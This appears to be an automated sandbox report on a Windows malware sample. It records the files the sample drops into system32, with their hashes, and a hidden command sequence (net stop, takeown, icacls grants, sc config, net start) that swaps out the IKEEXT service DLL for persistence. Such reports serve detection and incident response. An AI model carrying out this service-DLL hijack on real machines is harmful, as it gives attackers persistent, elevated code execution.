| c:\windows\system32\sensr9.dat | 4.00 KB (4096 bytes) |
MD5:
422a9797a40f1b1c3a72e9674adffedb
SHA1: 92e351c5e1cc5abc36fb003b435acbc018253f56 SHA256: e002a93f45a9c9577b3f5edd5a018b2d0ad68783db483b77b23cf56016824fac |
|
|
| c:\windows\system32\sensr3.dat | 97.43 KB (99767 bytes) |
MD5:
6317421e5b20c3df65bf66b4ec472187
SHA1: c6ed48d2daf396178b1840a1877532c429d85cd0 SHA256: 2f64a87596e52aea3579fd696b472480e90c275d1cdef7e6ac44fea8ea8b4be1 |
|
|
| c:\windows\system32\ikeext.dll | 132.50 KB (135680 bytes) |
MD5:
c3217cf9789f2b7a41f8ce54692d18fd
SHA1: f5bc9b2373201b214b3d0d248c95716023bc0c14 SHA256: f29d6f95c7ae0724bcd4aa64b41c4dc6c88479610dc14272af77376b4b5a26de |
|
|
| c:\windows\system32\ikeext32.dll | 658.50 KB (674304 bytes) |
MD5:
f95622f161474511b8d80d6b093aa610
SHA1: 691848e306566c63f5dfe1edcca7c7e8882c4caa SHA256: f2320e25eb9b4aa9a8366bd3aa23eabebe111a5610d3a62eba47d90427d5bc26 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sensr9.dat | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\sensr3.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\system32\ikeext.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Windows\system32\sensr3.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\system32\ikeext.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\system32\sensr9.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE |
|
1 | ||
| Open | STD_OUTPUT_HANDLE |
|
1 | ||
| Open | STD_ERROR_HANDLE |
|
1 | ||
| Move | C:\Windows\system32\ikeext32.dll | source_filename = C:\Windows\system32\ikeext.dll |
|
1 | |
| Write | C:\Windows\system32\sensr9.dat | size = 4096 |
|
1 | |
| Write | C:\Windows\system32\sensr3.dat | size = 99767 |
|
1 | |
| Write | C:\Windows\system32\ikeext.dll | size = 135680 |
|
1 | |
| Delete | C:\Windows\system32\ikeext.dll |
|
2 | ||
| Delete | C:\Windows\system32\sensr3.dat |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe /c "net stop /y ikeext" | os_pid = 0xb7c, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll" | os_pid = 0xba0, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F" | os_pid = 0xbc0, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F" | os_pid = 0xbe0, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto" | os_pid = 0xc00, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe /c "net start ikeext" | os_pid = 0xc20, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x0 |
|
4 | |
| Load | kernel32 | base_address = 0x0 |
|
2 | |
| Load | kernel32 | base_address = 0x76590000 |
|
2 | |
| Load | api-ms-win-core-fibers-l1-1-1 | base_address = 0x0 |
|
4 | |
| Load | api-ms-win-core-localization-l1-2-1 | base_address = 0x0 |
|
2 | |
| Load | Shlwapi | base_address = 0x76b40000 |
|
1 | |
| Load | Shell32 | base_address = 0x758a0000 |
|
1 | |
| Load | Advapi32 | base_address = 0x764f0000 |
|
1 | |
| Get Filename | api-ms-win-core-localization-l1-2-1 | process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Windows\system32\rundll32.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x765e3879 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x765e418d |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x765e76e6 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x765e1e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7661f72b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x765e1f61 |
|
2 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Hardware Information |
|
3 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
7 | |
| Get Info | type = Operating System |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
1 |
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c "net stop /y ikeext" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:28 |
| Information | Value |
|---|---|
| PID | 0xb7c |
| Parent PID | 0xb74 (c:\windows\system32\rundll32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B80
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE |
|
5 | ||
| Open | STD_INPUT_HANDLE |
|
3 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\net.exe | os_pid = 0xb90, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 |
|
2 | |
| Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x765e24c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x765cac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x765e2732 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-11 11:01:34 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 80465 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
7 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD, value = 0 |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000002 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii, value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\net.exe |
| Command Line | net stop /y ikeext |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:28 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xb90 |
| Parent PID | 0xb7c (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B94
|
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\system32\net1.exe |
| Command Line | C:\Windows\system32\net1 stop /y ikeext |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:28 |
| Information | Value |
|---|---|
| PID | 0xb98 |
| Parent PID | 0xb90 (c:\windows\system32\net.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B9C
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
4 | |
| Open | STD_OUTPUT_HANDLE |
|
1 | ||
| Open | STD_ERROR_HANDLE |
|
1 | ||
| Write | STD_ERROR_HANDLE | size = 65 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 2 |
|
2 | |
| Write | STD_ERROR_HANDLE | size = 52 |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | NETMSG | base_address = 0x6d0e0000 |
|
1 | |
| Get Handle | c:\windows\system32\net1.exe | base_address = 0xf10000 |
|
1 | |
| Get Filename | process_name = c:\windows\system32\net1.exe, file_name_orig = C:\Windows\system32\net1.exe, size = 260 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Display Name | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Get Info | service_name = IKEEXT |
|
1 | |
| Get Service Name | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-11 11:01:34 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 80652 |
|
1 |
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:28 |
| Information | Value |
|---|---|
| PID | 0xba0 |
| Parent PID | 0xb74 (c:\windows\system32\rundll32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BA4
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE |
|
5 | ||
| Open | STD_INPUT_HANDLE |
|
3 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xbb4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 |
|
2 | |
| Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x765e24c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x765cac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x765e2732 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-11 11:01:35 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 80730 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
7 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD, value = 0 |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii, value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:28 |
| Information | Value |
|---|---|
| PID | 0xbc0 |
| Parent PID | 0xb74 (c:\windows\system32\rundll32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BC4
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE |
|
5 | ||
| Open | STD_INPUT_HANDLE |
|
3 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 224, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\icacls.exe | os_pid = 0xbd4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 |
|
2 | |
| Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x765e24c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x765cac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x765e2732 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-11 11:01:35 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 81104 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
7 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD, value = 0 |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii, value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:48, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Information | Value |
|---|---|
| PID | 0xbe0 |
| Parent PID | 0xb74 (c:\windows\system32\rundll32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BE4
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE |
|
5 | ||
| Open | STD_INPUT_HANDLE |
|
3 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
